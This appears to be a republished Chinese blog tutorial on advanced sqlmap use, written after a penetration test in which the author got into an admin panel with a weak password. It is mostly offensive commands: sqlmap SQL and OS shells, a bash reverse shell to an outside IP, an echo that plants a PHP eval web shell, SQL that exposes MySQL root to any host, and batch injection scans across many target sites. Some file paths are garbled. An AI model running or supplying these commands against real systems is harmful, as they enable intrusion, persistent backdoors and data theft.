sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程
昨天對一個網站做滲透測試,本來想自己寫腳本來sql注入的,但是覺得麻煩還是用了sqlmap
這一用發現sqlmap好多好玩的地方,以前用sqlmap 也就 -r -u ,覺得這樣就夠用了,直到昨天才發現 如同天上降魔主,真是人間太歲神 這個sqlmap……牛x
弱口令進入后臺
發現sql注入(至少有xor注入)
上sqlmap(因為懶)
抓包
Sqlmap的 基本流程我就不走了,直接上我發現的好玩的東西吧
python3 .sqlmap.py -r C:甥敳獲wzwDesktopdd.txt -p searchField --sql-shell
1. 通過sqlmap連接mysql獲取shell
一、sqlmap 可以直連數據庫,之前我都一直用navicat連的
sqlmap.py -d “mysql://root:xxx@x.x.x.x:3306/mysql”–os-shell
二、反彈shell
bash -i >& /dev/tcp/192.168.1.3/8888>&1
三、echo 寫shell
echo “<?php @eval($_POST['chopper']);?>” >/var/www/html/1.php
四、讓sql 無密碼
use mysql;
update userset host = ‘%’ where user = ‘root’;
FLUSHPRIVILEGES ;
有時候對一些網站做資產收集(比如護網的時候),想對他們做批量的sql注入檢測這時候我們可以配合burp來進行批量注入
1. 首先是burp設置記錄log
2. 2.把記錄的log文件放sqlmap目錄
3. 3.sqlmap讀log自動測試:
python sqlmap.py -l 文件名 --batch -smart
batch:自動選yes。
smart:啟發式快速判斷,節約時間。
最后能注入的url會保存到out文件夾下
注意:log文件中如果有sqlmap無法讀取的字符(ascii碼之外的字符)會讀取失敗。
執行命令:sqlmap.py -l burp.log --batch -smart 即可對burp.log中保存的所有request進行注入掃描。
Batch:會自動選擇yes(這個很贊,我可不希望一直按 回車回車回車……)
Smart:啟發式快速判斷,節約時間。
window版的sqlmap最后能注入的URL 會存儲到C:甥敳獲Administrator.sqlmap文件夾下。
批量注入
Sqlmap可以從文本文件中解析目標
url.txt,內容為:
? www.target1.com/vuln1.php?q=foobar? www.target2.com/vuln2.asp?id=1? www.target3.com/vuln3/id/1*?可以執行?? python sqlmap.py -m url.txt?同樣,執行該命令時,Sqlmap會很貼心地一個個詢問:“do you want to test this URL”?顯然sqlmap還沒通過圖靈測試,這并不是我們希望看到的所以
? python sqlmap.py -m url.txt --batch?這樣我門就可以默認回答他”YES i want to test this url”總結
以上是生活随笔為你收集整理的sqlmap自动扫描注入点_同天上降魔主,真是人间太岁神——SQLMAP 高级教程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python 代码转程序_python将
- 下一篇: linux 查看mysql安装目录_Li